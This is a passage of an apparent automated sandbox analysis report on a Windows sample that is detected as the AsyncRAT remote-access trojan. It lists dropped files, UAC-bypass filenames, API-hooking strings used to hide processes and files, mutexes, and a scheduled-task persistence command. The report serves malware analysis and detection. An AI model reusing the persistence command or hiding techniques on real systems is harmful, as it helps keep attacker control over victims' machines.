                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CA28DC NtEnumerateValueKey,NtEnumerateValueKey,14_2_00000262F1CA28DC
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E152544 NtQueryDirectoryFileEx,GetFileType,StrCpyW,15_2_000002234E152544
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_000002287AD72034 NtQuerySystemInformation,StrCmpNIW,18_2_000002287AD72034
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_000002287AD72544 NtQueryDirectoryFileEx,GetFileType,StrCpyW,18_2_000002287AD72544
                Source: C:\Windows\System32\lsass.exeFile created: C:\Windows\system32\Microsoft\Protect\S-1-5-18\User\7415a32d-d2c0-4e8d-943e-3e817e4bf894
                Source: C:\Windows\System32\lsass.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
                Source: C:\Windows\System32\lsass.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
                Source: C:\Windows\System32\lsass.exeFile deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
                Source: C:\Users\user\Desktop\r8k29DBraE.exeCode function: 1_2_000002616F313E181_2_000002616F313E18
                Source: C:\Users\user\Desktop\r8k29DBraE.exeCode function: 1_2_000002616F30D6501_2_000002616F30D650
                Source: C:\Users\user\Desktop\r8k29DBraE.exeCode function: 1_2_000002616F301F401_2_000002616F301F40
                Source: C:\Users\user\Desktop\r8k29DBraE.exeCode function: 1_2_000002616F5A62181_2_000002616F5A6218
                Source: C:\Users\user\Desktop\r8k29DBraE.exeCode function: 1_2_000002616F5A4A181_2_000002616F5A4A18
                Source: C:\Users\user\Desktop\r8k29DBraE.exeCode function: 1_2_000002616F5A61001_2_000002616F5A6100
                Source: C:\Users\user\Desktop\r8k29DBraE.exeCode function: 1_2_000002616F5A61001_2_000002616F5A6100
                Source: C:\Users\user\Desktop\r8k29DBraE.exeCode function: 1_2_000002616F59E2501_2_000002616F59E250
                Source: C:\Users\user\Desktop\r8k29DBraE.exeCode function: 1_2_000002616F592B401_2_000002616F592B40
                Source: C:\Users\user\Desktop\r8k29DBraE.exeCode function: 1_2_00007FFAAC560C5E1_2_00007FFAAC560C5E
                Source: C:\Users\user\Desktop\wzcsapi.exeCode function: 3_2_00007FFAAC5981B63_2_00007FFAAC5981B6
                Source: C:\Users\user\Desktop\wzcsapi.exeCode function: 3_2_00007FFAAC598F623_2_00007FFAAC598F62
                Source: C:\Users\user\Desktop\wzcsapi.exeCode function: 3_2_00007FFAAC5914853_2_00007FFAAC591485
                Source: C:\Users\user\Desktop\wzcsvc.exeCode function: 4_2_0000023EB69F1F404_2_0000023EB69F1F40
                Source: C:\Users\user\Desktop\wzcsvc.exeCode function: 4_2_0000023EB6A03E184_2_0000023EB6A03E18
                Source: C:\Users\user\Desktop\wzcsvc.exeCode function: 4_2_0000023EB69FD6504_2_0000023EB69FD650
                Source: C:\Users\user\Desktop\wzcsvc.exeCode function: 4_2_00007FF6B5AD22644_2_00007FF6B5AD2264
                Source: C:\Users\user\Desktop\wzcsvc.exeCode function: 4_2_00007FF6B5AD14D04_2_00007FF6B5AD14D0
                Source: C:\Users\user\Desktop\wzcsvc.exeCode function: 4_2_00007FF6B5AD25584_2_00007FF6B5AD2558
                Source: C:\Windows\System32\svchost.exeCode function: 5_2_0000021681981F405_2_0000021681981F40
                Source: C:\Windows\System32\svchost.exeCode function: 5_2_0000021681993E185_2_0000021681993E18
                Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002168198D6505_2_000002168198D650
                Source: C:\Windows\System32\svchost.exeCode function: 5_2_00000216819B2B405_2_00000216819B2B40
                Source: C:\Windows\System32\svchost.exeCode function: 5_2_00000216819C4A185_2_00000216819C4A18
                Source: C:\Windows\System32\svchost.exeCode function: 5_2_00000216819BE2505_2_00000216819BE250
                Source: C:\Windows\System32\winlogon.exeCode function: 6_2_000001CA7D1C3E186_2_000001CA7D1C3E18
                Source: C:\Windows\System32\winlogon.exeCode function: 6_2_000001CA7D1BD6506_2_000001CA7D1BD650
                Source: C:\Windows\System32\winlogon.exeCode function: 6_2_000001CA7D1B1F406_2_000001CA7D1B1F40
                Source: C:\Windows\System32\winlogon.exeCode function: 6_2_000001CA7D1F62186_2_000001CA7D1F6218
                Source: C:\Windows\System32\winlogon.exeCode function: 6_2_000001CA7D1F4A186_2_000001CA7D1F4A18
                Source: C:\Windows\System32\winlogon.exeCode function: 6_2_000001CA7D1EE2506_2_000001CA7D1EE250
                Source: C:\Windows\System32\winlogon.exeCode function: 6_2_000001CA7D1F61006_2_000001CA7D1F6100
                Source: C:\Windows\System32\winlogon.exeCode function: 6_2_000001CA7D1F61006_2_000001CA7D1F6100
                Source: C:\Windows\System32\winlogon.exeCode function: 6_2_000001CA7D1E2B406_2_000001CA7D1E2B40
                Source: C:\Windows\System32\WerFault.exeCode function: 8_2_00000265B3C160E88_2_00000265B3C160E8
                Source: C:\Windows\System32\WerFault.exeCode function: 8_2_00000265B3C02B408_2_00000265B3C02B40
                Source: C:\Windows\System32\WerFault.exeCode function: 8_2_00000265B3C0E2508_2_00000265B3C0E250
                Source: C:\Windows\System32\WerFault.exeCode function: 8_2_00000265B3C162188_2_00000265B3C16218
                Source: C:\Windows\System32\WerFault.exeCode function: 8_2_00000265B3C14A188_2_00000265B3C14A18
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD21F409_2_0000017D2DD21F40
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD2D6509_2_0000017D2DD2D650
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD33E189_2_0000017D2DD33E18
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD660E89_2_0000017D2DD660E8
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD52B409_2_0000017D2DD52B40
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD5E2509_2_0000017D2DD5E250
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD662189_2_0000017D2DD66218
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD64A189_2_0000017D2DD64A18
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000022F4B8F1F4010_2_0000022F4B8F1F40
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000022F4B8FD65010_2_0000022F4B8FD650
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000022F4B903E1810_2_0000022F4B903E18
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000022F4B922B4010_2_0000022F4B922B40
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000022F4B92E25010_2_0000022F4B92E250
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000022F4B934A1810_2_0000022F4B934A18
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000013DE273621811_2_0000013DE2736218
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000013DE2734A1811_2_0000013DE2734A18
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000013DE272E25011_2_0000013DE272E250
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000013DE2722B4011_2_0000013DE2722B40
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CB621814_2_00000262F1CB6218
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CB4A1814_2_00000262F1CB4A18
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CB610014_2_00000262F1CB6100
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CB610014_2_00000262F1CB6100
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CA2B4014_2_00000262F1CA2B40
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CAE25014_2_00000262F1CAE250
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1EA1F4014_2_00000262F1EA1F40
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1EAD65014_2_00000262F1EAD650
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1EB3E1814_2_00000262F1EB3E18
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E133E1815_2_000002234E133E18
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E12D65015_2_000002234E12D650
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E121F4015_2_000002234E121F40
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E16621815_2_000002234E166218
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E164A1815_2_000002234E164A18
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E15E25015_2_000002234E15E250
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E152B4015_2_000002234E152B40
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E1660E815_2_000002234E1660E8
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000023942AF3E1816_2_0000023942AF3E18
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000023942AED65016_2_0000023942AED650
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000023942AE1F4016_2_0000023942AE1F40
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000023942B12B4016_2_0000023942B12B40
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000023942B24A1816_2_0000023942B24A18
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000023942B1E25016_2_0000023942B1E250
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001EF056A1F4017_2_000001EF056A1F40
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001EF056AD65017_2_000001EF056AD650
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001EF056B3E1817_2_000001EF056B3E18
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001EF056D2B4017_2_000001EF056D2B40
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001EF056DE25017_2_000001EF056DE250
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001EF056E621817_2_000001EF056E6218
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001EF056E4A1817_2_000001EF056E4A18
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_000002287AD860E818_2_000002287AD860E8
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_000002287AD72B4018_2_000002287AD72B40
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_000002287AD8621818_2_000002287AD86218
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_000002287AD84A1818_2_000002287AD84A18
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_000002287AD7E25018_2_000002287AD7E250
                Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001B94DA61F4019_2_000001B94DA61F40
                Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001B94DA6D65019_2_000001B94DA6D650
                Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001B94DA73E1819_2_000001B94DA73E18
                Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001B94DA92B4019_2_000001B94DA92B40
                Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001B94DA9E25019_2_000001B94DA9E250
                Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001B94DAA4A1819_2_000001B94DAA4A18
                Source: C:\Windows\System32\svchost.exeCode function: 20_2_0000025202553E1820_2_0000025202553E18
                Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002520254D65020_2_000002520254D650
                Source: C:\Windows\System32\svchost.exeCode function: 20_2_0000025202541F4020_2_0000025202541F40
                Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002520258621820_2_0000025202586218
                Source: C:\Windows\System32\svchost.exeCode function: 20_2_0000025202584A1820_2_0000025202584A18
                Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002520257E25020_2_000002520257E250
                Source: C:\Windows\System32\svchost.exeCode function: 20_2_0000025202572B4020_2_0000025202572B40
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001A9EBFC2B4021_2_000001A9EBFC2B40
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001A9EBFCE25021_2_000001A9EBFCE250
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001A9EBFD4A1821_2_000001A9EBFD4A18
                Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000019FF1601F4022_2_0000019FF1601F40
                Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000019FF1613E1822_2_0000019FF1613E18
                Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000019FF160D65022_2_0000019FF160D650
                Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000019FF1632B4022_2_0000019FF1632B40
                Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000019FF1644A1822_2_0000019FF1644A18
                Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000019FF163E25022_2_0000019FF163E250
                Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\wzcsvc.exe F7DD8D6299C108A3221C31BF33637F59F0E19703AAA88B1E3A4F1093E7209A5D
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 432 -p 1408 -ip 1408
                Source: wzcsvc.exe.1.drStatic PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                Source: r8k29DBraE.exe, 00000001.00000000.1322519475.000002616CAB2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewzshlstb.exe4 vs r8k29DBraE.exe
                Source: r8k29DBraE.exe, 00000001.00000000.1322519475.000002616CAB2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesimple.exe" vs r8k29DBraE.exe
                Source: r8k29DBraE.exe, 00000001.00000002.1595250313.00000261000C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEncrypted.exe4 vs r8k29DBraE.exe
                Source: r8k29DBraE.exe, 00000001.00000002.1598791740.000002616E810000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewzshlstb.exe4 vs r8k29DBraE.exe
                Source: r8k29DBraE.exe, 00000001.00000002.1598791740.000002616E810000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamesimple.exe" vs r8k29DBraE.exe
                Source: r8k29DBraE.exe, 00000001.00000000.1322519475.000002616CB38000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBypassUAC.exe4 vs r8k29DBraE.exe
                Source: r8k29DBraE.exeBinary or memory string: OriginalFilenamewzshlstb.exe4 vs r8k29DBraE.exe
                Source: r8k29DBraE.exeBinary or memory string: OriginalFilenamesimple.exe" vs r8k29DBraE.exe
                Source: r8k29DBraE.exeBinary or memory string: OriginalFilenameBypassUAC.exe4 vs r8k29DBraE.exe
                Source: 3.2.wzcsapi.exe.28cf290.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 3.2.wzcsapi.exe.1bee0000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000003.00000002.2674092147.000000001BEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000003.00000002.2644119365.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: r8k29DBraE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: wzcsapi.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: r8k29DBraE.exe, -Module-.csCryptographic APIs: 'CreateDecryptor'
                Source: 1.2.r8k29DBraE.exe.2616e810000.11.raw.unpack, ---99w-ak--ev-8q-lg-7--bo.csCryptographic APIs: 'CreateDecryptor'
                Source: 1.2.r8k29DBraE.exe.2616e810000.11.raw.unpack, 2-eaq-rvqt-9ov-hv8-iamz6-p-.csCryptographic APIs: 'CreateDecryptor'
                Source: 1.2.r8k29DBraE.exe.2611006dab0.2.raw.unpack, ---99w-ak--ev-8q-lg-7--bo.csCryptographic APIs: 'CreateDecryptor'
                Source: 1.2.r8k29DBraE.exe.2611006dab0.2.raw.unpack, 2-eaq-rvqt-9ov-hv8-iamz6-p-.csCryptographic APIs: 'CreateDecryptor'
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, Iloveyou.csCryptographic APIs: 'TransformFinalBlock'
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, Iloveyou.csCryptographic APIs: 'TransformFinalBlock'
                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, Iloveyou.csCryptographic APIs: 'TransformFinalBlock'
                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, Iloveyou.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.r8k29DBraE.exe.261000e7650.1.raw.unpack, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 1.2.r8k29DBraE.exe.261000e7650.1.raw.unpack, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, Youwillstay.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, Youwillstay.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, Youwillstay.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, Youwillstay.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: wzcsapi.exe.1.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: wzcsapi.exe.1.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: System.evtx.23.drBinary string: \Device\HarddiskVolume3\Windows\ImmersiveControlPanel\SystemSettings.exeX
                Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.23.drBinary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
                Source: Microsoft-Windows-SMBServer%4Operational.evtx.23.drBinary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
                Source: wzcsvc.exe.1.drBinary string: SOFTWARE\wzconfigstartuppidprocess_namespathsservice_namestcp_localtcp_remoteudp\\?\NtQueryObjectntdll.dllNtQuerySystemInformationNtResumeThreadNtQueryDirectoryFileNtQueryDirectoryFileExNtEnumerateKeyNtEnumerateValueKeyEnumServiceGroupWadvapi32.dllEnumServicesStatusExWsechost.dllNtDeviceIoControlFile\\.\pipe\wzchildproc64\\.\pipe\wzchildproc32\\.\pipe\\Device\Nsiwz@
                Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.23.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.23.drBinary string: O\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
                Source: Microsoft-Windows-SMBServer%4Operational.evtx.23.drBinary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
                Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.23.drBinary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
                Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.23.drBinary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
                Source: Microsoft-Windows-SMBServer%4Operational.evtx.23.drBinary string: \Device\NetbiosSmb
                Source: System.evtx.23.drBinary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
                Source: System.evtx.23.drBinary string: \Device\HarddiskVolume3\Windows\System32\svchost.exe
                Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.23.drBinary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                Source: System.evtx.23.drBinary string: C:\Device\HarddiskVolume3
                Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.23.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeP**
                Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.23.drBinary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
                Source: System.evtx.23.drBinary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe
                Source: System.evtx.23.drBinary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4ic
                Source: System.evtx.23.drBinary string: \Device\HarddiskVolume3\Windows\System32\svchost.exeT
                Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.23.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
                Source: System.evtx.23.drBinary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
                Source: Microsoft-Windows-SMBServer%4Operational.evtx.23.drBinary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
                Source: Microsoft-Windows-SMBServer%4Operational.evtx.23.drBinary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
                Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.23.drBinary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
                Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.23.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
                Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@16/81@3/4
                Source: C:\Users\user\Desktop\wzcsvc.exeCode function: 4_2_00007FF6B5AD2264 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,4_2_00007FF6B5AD2264
                Source: C:\Users\user\Desktop\wzcsvc.exeCode function: 4_2_00007FF6B5AD19BC SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,4_2_00007FF6B5AD19BC
                Source: C:\Users\user\Desktop\wzcsvc.exeCode function: 4_2_00007FF6B5AD2264 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,4_2_00007FF6B5AD2264
                Source: C:\Users\user\Desktop\r8k29DBraE.exeFile created: C:\Users\user\Desktop\wzcsapi.exeJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeMutant created: \Sessions\1\BaseNamedObjects\?P?IXNtJ?rCWp?x???MWE?D21Lc??A
                Source: C:\Users\user\Desktop\wzcsapi.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
                Source: C:\Users\user\Desktop\wzcsapi.exeMutant created: \Sessions\1\BaseNamedObjects\??8??????9???!???
                Source: C:\Users\user\Desktop\r8k29DBraE.exeMutant created: \Sessions\1\BaseNamedObjects\zBiiU5rd5BQKcgVCL
                Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1408
                Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\32002d0d-a128-4623-9bc5-632f4c5e4b48Jump to behavior
                Source: r8k29DBraE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: r8k29DBraE.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\r8k29DBraE.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: r8k29DBraE.exeReversingLabs: Detection: 66%
                Source: C:\Users\user\Desktop\r8k29DBraE.exeFile read: C:\Users\user\Desktop\r8k29DBraE.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\r8k29DBraE.exe "C:\Users\user\Desktop\r8k29DBraE.exe"
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess created: C:\Users\user\Desktop\wzcsapi.exe "C:\Users\user\Desktop\wzcsapi.exe"
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess created: C:\Users\user\Desktop\wzcsvc.exe "C:\Users\user\Desktop\wzcsvc.exe"
                Source: C:\Users\user\Desktop\wzcsvc.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 432 -p 1408 -ip 1408
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1408 -s 1088
                Source: C:\Windows\System32\lsass.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "wzcsapi" /tr "%Current%\wzcsapi.exe"
                Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\wzcsvc.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess created: C:\Users\user\Desktop\wzcsapi.exe "C:\Users\user\Desktop\wzcsapi.exe" Jump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess created: C:\Users\user\Desktop\wzcsvc.exe "C:\Users\user\Desktop\wzcsvc.exe" Jump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "wzcsapi" /tr "%Current%\wzcsapi.exe"Jump to behavior
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 432 -p 1408 -ip 1408Jump to behavior
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1408 -s 1088Jump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeSection loaded: mscoree.dllJump to behavior
